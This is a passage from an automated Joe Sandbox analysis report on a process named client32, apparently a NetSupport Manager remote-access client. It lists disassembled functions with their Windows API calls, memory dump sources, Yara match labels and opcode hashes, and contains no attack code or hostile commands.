                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                        • String ID: RESULT$b
                                                                                                                                        • API String ID: 3168844106-4141403093
                                                                                                                                        APIs
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6890C190
                                                                                                                                        • _malloc.LIBCMT ref: 6890C199
                                                                                                                                          • Part of subcall function 68911B69: __FF_MSGBANNER.LIBCMT ref: 68911B82
                                                                                                                                          • Part of subcall function 68911B69: __NMSG_WRITE.LIBCMT ref: 68911B89
                                                                                                                                          • Part of subcall function 68911B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6891D3C1,68916E81,00000001,68916E81,?,6891F447,00000018,68937738,0000000C,6891F4D7), ref: 68911BAE
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6890C1B0
                                                                                                                                          • Part of subcall function 6890BA20: __strdup.LIBCMT ref: 6890BA3A
                                                                                                                                        • _free.LIBCMT ref: 6890C1C2
                                                                                                                                          • Part of subcall function 68911BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68911C13
                                                                                                                                          • Part of subcall function 68911BFD: GetLastError.KERNEL32(00000000), ref: 68911C25
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharHeapMultiWide$AllocateErrorFreeLast__strdup_free_malloc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2344877359-0
                                                                                                                                        • Opcode ID: 42e69b1d70bf9c322fdd62ec5599f81344eb3bc9432179871783536001e4dd84
                                                                                                                                        • Instruction ID: 9e3119ab55f29d1648c54c19800643587df60e231a96e4eab920a3f727eeed43
                                                                                                                                        • Opcode Fuzzy Hash: 42e69b1d70bf9c322fdd62ec5599f81344eb3bc9432179871783536001e4dd84
                                                                                                                                        • Instruction Fuzzy Hash: BAF0B47578921877F63046494C46FBF765CCB97B75F200255FB18AB2C0E6A0BC0082B9
                                                                                                                                        APIs
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6890C7BF
                                                                                                                                        • _malloc.LIBCMT ref: 6890C7C8
                                                                                                                                          • Part of subcall function 68911B69: __FF_MSGBANNER.LIBCMT ref: 68911B82
                                                                                                                                          • Part of subcall function 68911B69: __NMSG_WRITE.LIBCMT ref: 68911B89
                                                                                                                                          • Part of subcall function 68911B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6891D3C1,68916E81,00000001,68916E81,?,6891F447,00000018,68937738,0000000C,6891F4D7), ref: 68911BAE
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6890C7E2
                                                                                                                                          • Part of subcall function 6890C600: _memmove.LIBCMT ref: 6890C698
                                                                                                                                        • _free.LIBCMT ref: 6890C7F3
                                                                                                                                          • Part of subcall function 68911BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68911C13
                                                                                                                                          • Part of subcall function 68911BFD: GetLastError.KERNEL32(00000000), ref: 68911C25
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharHeapMultiWide$AllocateErrorFreeLast_free_malloc_memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3230522339-0
                                                                                                                                        • Opcode ID: e17a7ab1cb7e863c245946ec65746883b75867ccbf610b950226bc3c8a8cb5eb
                                                                                                                                        • Instruction ID: 98336cb2bfd983da7722c49ebcd00f6f5efb9e5e9b171fcb95155d21de0e1668
                                                                                                                                        • Opcode Fuzzy Hash: e17a7ab1cb7e863c245946ec65746883b75867ccbf610b950226bc3c8a8cb5eb
                                                                                                                                        • Instruction Fuzzy Hash: D9F0827538C2147BF63016999C46F7F764C8B66B79F700325FB25AA2C0D9E0B80082B9
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6890F4EE
                                                                                                                                        • EnterCriticalSection.KERNEL32 ref: 6890F4F8
                                                                                                                                        • LeaveCriticalSection.KERNEL32 ref: 6890F518
                                                                                                                                        • LeaveCriticalSection.KERNEL32 ref: 6890F52C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$Leave$CurrentEnterThread
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2905768538-0
                                                                                                                                        • Opcode ID: f50f996d11fc575f3c391d734b0d111323c1e771b34a5d483767e03aeb21d773
                                                                                                                                        • Instruction ID: 1caee3c3d8b3c6cd31f3dc5473ecc808140d50751e0d46fc8a46ecee685da511
                                                                                                                                        • Opcode Fuzzy Hash: f50f996d11fc575f3c391d734b0d111323c1e771b34a5d483767e03aeb21d773
                                                                                                                                        • Instruction Fuzzy Hash: B6F06276204218EFC721DF58D8448AE77BCFF9A326B10416AF946D7200D770AA49CBE5
                                                                                                                                        APIs
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898), ref: 688F5B45
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898), ref: 688F5B76
                                                                                                                                        • SetEvent.KERNEL32(00000318), ref: 688F5B8E
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898), ref: 688F5B99
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$Leave$EnterEvent
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3394196147-0
                                                                                                                                        • Opcode ID: 046729647e86260430cd994729de443db5791921d320a9d2c1c61296e0b549f4
                                                                                                                                        • Instruction ID: 43ccce4e797fbc26d90ef00dc7688192843e6306a15cc5f6872d99299c877c3d
                                                                                                                                        • Opcode Fuzzy Hash: 046729647e86260430cd994729de443db5791921d320a9d2c1c61296e0b549f4
                                                                                                                                        • Instruction Fuzzy Hash: F8F06232448AB5AFCF319FA8944849D7BB4F7463A57808856E95F97801D720E846CBA1
                                                                                                                                        APIs
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898), ref: 688F5AD0
                                                                                                                                        • _memmove.LIBCMT ref: 688F5AEC
                                                                                                                                        • _memmove.LIBCMT ref: 688F5B0A
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898), ref: 688F5B17
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection_memmove$EnterLeave
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 324922381-0
                                                                                                                                        • Opcode ID: f9c857ec5f8f91c08e495680718b5f9b343a481d109e7428c4427d346b6384b4
                                                                                                                                        • Instruction ID: 4d24eebb8a3f970e2598f8a0d8ee2650be7db1656149aba59ea41519237adeaf
                                                                                                                                        • Opcode Fuzzy Hash: f9c857ec5f8f91c08e495680718b5f9b343a481d109e7428c4427d346b6384b4
                                                                                                                                        • Instruction Fuzzy Hash: 5AF0FE79608B24AFAA74DB64D895C2E73F9EBC5750B848828ED5A87700D721EC409BA1
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 688F2230: IsDBCSLeadByte.KERNEL32(00000000,?,?,688F24A2,?,?,688FE64B,?,publish,?,?,?,?,?,?,?), ref: 688F224C
                                                                                                                                        • CompareStringA.KERNEL32(00000400,00000000,?,?,?,?), ref: 688F291B
                                                                                                                                          • Part of subcall function 68912BF9: __isdigit_l.LIBCMT ref: 68912C1E
                                                                                                                                        • _strncmp.LIBCMT ref: 688F294F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCompareLeadString__isdigit_l_strncmp
                                                                                                                                        • String ID: {-.
                                                                                                                                        • API String ID: 3286074029-1528367491
                                                                                                                                        • Opcode ID: d91a63b68def0fa73823965059bd22ed96af9ddef40cb9eb1e476ae76802cb62
                                                                                                                                        • Instruction ID: d37fd076296f1e46635dbb8e6fe3be40e10c67bc54f8397ccb11164289720ae0
                                                                                                                                        • Opcode Fuzzy Hash: d91a63b68def0fa73823965059bd22ed96af9ddef40cb9eb1e476ae76802cb62
                                                                                                                                        • Instruction Fuzzy Hash: 81714B64B0C2D95BEB109EB94C4077A7BE49F4E294F94487AECF487241E33DC943D2A1
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                          • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                                        • CreateWindowExA.USER32(00000000,edit,00000000,40040004,?,?,?,?,?,00000002,00000000,?), ref: 11007327
                                                                                                                                        • SetFocus.USER32(?), ref: 11007383
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateFocusWindow_memsetwsprintf
                                                                                                                                        • String ID: edit
                                                                                                                                        • API String ID: 133491855-2167791130
                                                                                                                                        • Opcode ID: f65e150b113dac071697823f5246cea45f0e0d9d2d8fe942133c289e5f9292e4
                                                                                                                                        • Instruction ID: f78834b4020d8e2e6f829c6f5032a1a8cba214c943ee8e0f2be50220b25a4479
                                                                                                                                        • Opcode Fuzzy Hash: f65e150b113dac071697823f5246cea45f0e0d9d2d8fe942133c289e5f9292e4
                                                                                                                                        • Instruction Fuzzy Hash: 4851B0B5A00606AFE741CFA8DC80BABB7E5FB48354F11856DF995C7340EA34A942CB61
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 6890DBD0: _malloc.LIBCMT ref: 6890DBE9
                                                                                                                                          • Part of subcall function 6890DBD0: wsprintfA.USER32 ref: 6890DC04
                                                                                                                                          • Part of subcall function 6890DBD0: _memset.LIBCMT ref: 6890DC27
                                                                                                                                        • std::exception::exception.LIBCMT ref: 68900EEB
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 68900F00
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                                        • String ID: PIN
                                                                                                                                        • API String ID: 1338273076-589459321
                                                                                                                                        • Opcode ID: d35aa92caba9c1f016268559d1efd29061c58f83152634aae62207a21ae4b1cb
                                                                                                                                        • Instruction ID: 8d9845c812b1d5b0e70bde0332543c94788795ac386ce81fa824580aaa11dce5
                                                                                                                                        • Opcode Fuzzy Hash: d35aa92caba9c1f016268559d1efd29061c58f83152634aae62207a21ae4b1cb
                                                                                                                                        • Instruction Fuzzy Hash: F9410EB5D04248AFDF10DFE8D8809AEBBB8FB59318F90452EE426E7240E7359A44CB51
                                                                                                                                        APIs
                                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 688FFBD5
                                                                                                                                        • _memmove.LIBCMT ref: 688FFC26
                                                                                                                                          • Part of subcall function 688FF470: std::_Xinvalid_argument.LIBCPMT ref: 688FF48A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                                                                        • String ID: string too long
                                                                                                                                        • API String ID: 2168136238-2556327735
                                                                                                                                        • Opcode ID: 675a0ef90f67fc60577e46466d6eda103b300ac55a815254a43d685bbe351327
                                                                                                                                        • Instruction ID: f12b91b900cae880464b63ee47fdad1c89ef756c5f1751ef1dd5d5776d4ebbc7
                                                                                                                                        • Opcode Fuzzy Hash: 675a0ef90f67fc60577e46466d6eda103b300ac55a815254a43d685bbe351327
                                                                                                                                        • Instruction Fuzzy Hash: D53109323046204BD3208E5CE89096AF7E9EBB56A4BA04D3FF991C7750CBE1DC42C3A1
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _malloc
                                                                                                                                        • String ID: buf$e:\nsmsrc\nsm\1210\1210f\ctl32\uuencode.c
                                                                                                                                        • API String ID: 1579825452-1222102314
                                                                                                                                        • Opcode ID: 9e8ea965835b7adfc9b92d91fa096192cd0074a4a0774b332255f3ad9df77520
                                                                                                                                        • Instruction ID: 6305d350ab4c339c3062bee1c9e702bfcb7ea08437038df521c4cc576ae0f5b6
                                                                                                                                        • Opcode Fuzzy Hash: 9e8ea965835b7adfc9b92d91fa096192cd0074a4a0774b332255f3ad9df77520
                                                                                                                                        • Instruction Fuzzy Hash: 1C213AA6E411412FD3010A3C5C945FA37EC8B67138B584739E8BAC72C2F636D50E8362
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free
                                                                                                                                        • String ID: DATA
                                                                                                                                        • API String ID: 269201875-2607161047
                                                                                                                                        • Opcode ID: 4bcf6e97e69771caef7888f65f0b24bdb1f6317eaf7bde31c7f94695a5ecb7e6
                                                                                                                                        • Instruction ID: be9a7e6234f76fdeef647e772528474a72f3d76b3d57c0a7adfc06b6fdd95687
                                                                                                                                        • Opcode Fuzzy Hash: 4bcf6e97e69771caef7888f65f0b24bdb1f6317eaf7bde31c7f94695a5ecb7e6
                                                                                                                                        • Instruction Fuzzy Hash: E331B1B5D04249ABEB01DBA88D00BBF77F89F95254F8445A8E819E7200F735DB1587E2
                                                                                                                                        APIs
                                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 688FF3B4
                                                                                                                                          • Part of subcall function 68911913: std::exception::exception.LIBCMT ref: 68911928
                                                                                                                                          • Part of subcall function 68911913: __CxxThrowException@8.LIBCMT ref: 6891193D
                                                                                                                                          • Part of subcall function 68911913: std::exception::exception.LIBCMT ref: 6891194E
                                                                                                                                        • _memmove.LIBCMT ref: 688FF3FB
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                                        • String ID: string too long
                                                                                                                                        • API String ID: 1785806476-2556327735
                                                                                                                                        • Opcode ID: a983f20e56155ce31968540275e36e4c4dd754d4c92555a7af223f64330c5e7e
                                                                                                                                        • Instruction ID: 810ff4bc7bb866472a8290dd8a6cfeac2c11144e949662ad824372b795f0758d
                                                                                                                                        • Opcode Fuzzy Hash: a983f20e56155ce31968540275e36e4c4dd754d4c92555a7af223f64330c5e7e
                                                                                                                                        • Instruction Fuzzy Hash: 8911E9725483145FE7209D78A8C0A2EB7A8AF71268F900E3EE593D3581DBA1E446C3A1
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID: @
                                                                                                                                        • API String ID: 4104443479-2766056989
                                                                                                                                        • Opcode ID: f9483b5ad1248861c0422d5c3db81375aa2358dc5ca2805fe77c16bdf1cdb177
                                                                                                                                        • Instruction ID: 7911b51f72c73a3d98f52021b32edb040068c94db7f2fc77c672dd7179e7c4bb
                                                                                                                                        • Opcode Fuzzy Hash: f9483b5ad1248861c0422d5c3db81375aa2358dc5ca2805fe77c16bdf1cdb177
                                                                                                                                        • Instruction Fuzzy Hash: 6211D3B6640709AFDB18CF58DCC09AB3379EB94314F50492DE9078B202E734EA4AC7A1
                                                                                                                                        APIs
                                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 688FC8A6
                                                                                                                                          • Part of subcall function 68911960: std::exception::exception.LIBCMT ref: 68911975
                                                                                                                                          • Part of subcall function 68911960: __CxxThrowException@8.LIBCMT ref: 6891198A
                                                                                                                                          • Part of subcall function 68911960: std::exception::exception.LIBCMT ref: 6891199B
                                                                                                                                        • _memmove.LIBCMT ref: 688FC8DF
                                                                                                                                        Strings
                                                                                                                                        • invalid string position, xrefs: 688FC8A1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                                        • String ID: invalid string position
                                                                                                                                        • API String ID: 1785806476-1799206989
                                                                                                                                        • Opcode ID: 9bbd5dba0e8c01a182b87c00805eda8442f532fd61a3d28ec87380ac0956a178
                                                                                                                                        • Instruction ID: c02a6a94a48a839cee52fac230809e9b44cc67b0809cd7b1edad181458988808
                                                                                                                                        • Opcode Fuzzy Hash: 9bbd5dba0e8c01a182b87c00805eda8442f532fd61a3d28ec87380ac0956a178
                                                                                                                                        • Instruction Fuzzy Hash: B70104327542289BD330C96CEC8092AB7ABEBC1690BA44D39D491CB702C670ED43C3A1
                                                                                                                                        APIs
                                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 11019155
                                                                                                                                          • Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBC8
                                                                                                                                          • Part of subcall function 1115CBB3: __CxxThrowException@8.LIBCMT ref: 1115CBDD
                                                                                                                                          • Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBEE
                                                                                                                                        • _memmove.LIBCMT ref: 11019184
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                                        • String ID: vector<T> too long
                                                                                                                                        • API String ID: 1785806476-3788999226
                                                                                                                                        • Opcode ID: 7f318a4f0ee09e05d674ed05e0d225db315ff90e224b0fed7e964b3f692f1594
                                                                                                                                        • Instruction ID: 308c0151805cc611b22231fe70dd9f684293cd40c739421a1377831650370b76
                                                                                                                                        • Opcode Fuzzy Hash: 7f318a4f0ee09e05d674ed05e0d225db315ff90e224b0fed7e964b3f692f1594
                                                                                                                                        • Instruction Fuzzy Hash: 6E0192B2E012059FD724CE69DC808A7B7E9EB95314715CA2EE59687704EA70F940CB90
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID: hbuf->data$httputil.c
                                                                                                                                        • API String ID: 4104443479-2732665889
                                                                                                                                        • Opcode ID: 35c2cd4323831367a16f5b45c18e7868a07a8e35e8313ceeb1b955293a7563e1
                                                                                                                                        • Instruction ID: bd124cba1e5cc1991241b85f7eaa3e611f86ef86b638539126bb1274e1f30e6e
                                                                                                                                        • Opcode Fuzzy Hash: 35c2cd4323831367a16f5b45c18e7868a07a8e35e8313ceeb1b955293a7563e1
                                                                                                                                        • Instruction Fuzzy Hash: 1601D6796042056FD720CE6CDC80D6AB3BDEFD8368B44C92DF949C7205D671F8408BA0
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __strdup
                                                                                                                                        • String ID: *this==pszSrc$NSMString.cpp
                                                                                                                                        • API String ID: 838363481-1924475612
                                                                                                                                        • Opcode ID: d9e1b7e8e0f23dc2342f20e2718d72df4a4ad948033143e28e56d1d3ff99e6e3
                                                                                                                                        • Instruction ID: 545633349a883e5d821bac9d04b7c701d9551118b7c80e7e539059df6dca1f41
                                                                                                                                        • Opcode Fuzzy Hash: d9e1b7e8e0f23dc2342f20e2718d72df4a4ad948033143e28e56d1d3ff99e6e3
                                                                                                                                        • Instruction Fuzzy Hash: 6BF028726043245BC7109A9DA805967B7FDCF9536CB84803EE899C7300E670D80586D0
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: wvsprintf
                                                                                                                                        • String ID: NSMString.cpp$pszBuffer[1024]==0
                                                                                                                                        • API String ID: 2795597889-2173072673
                                                                                                                                        • Opcode ID: 79e4e4a952558211e334d2ce5679751ebcb597392141644356bbee2edc293ad9
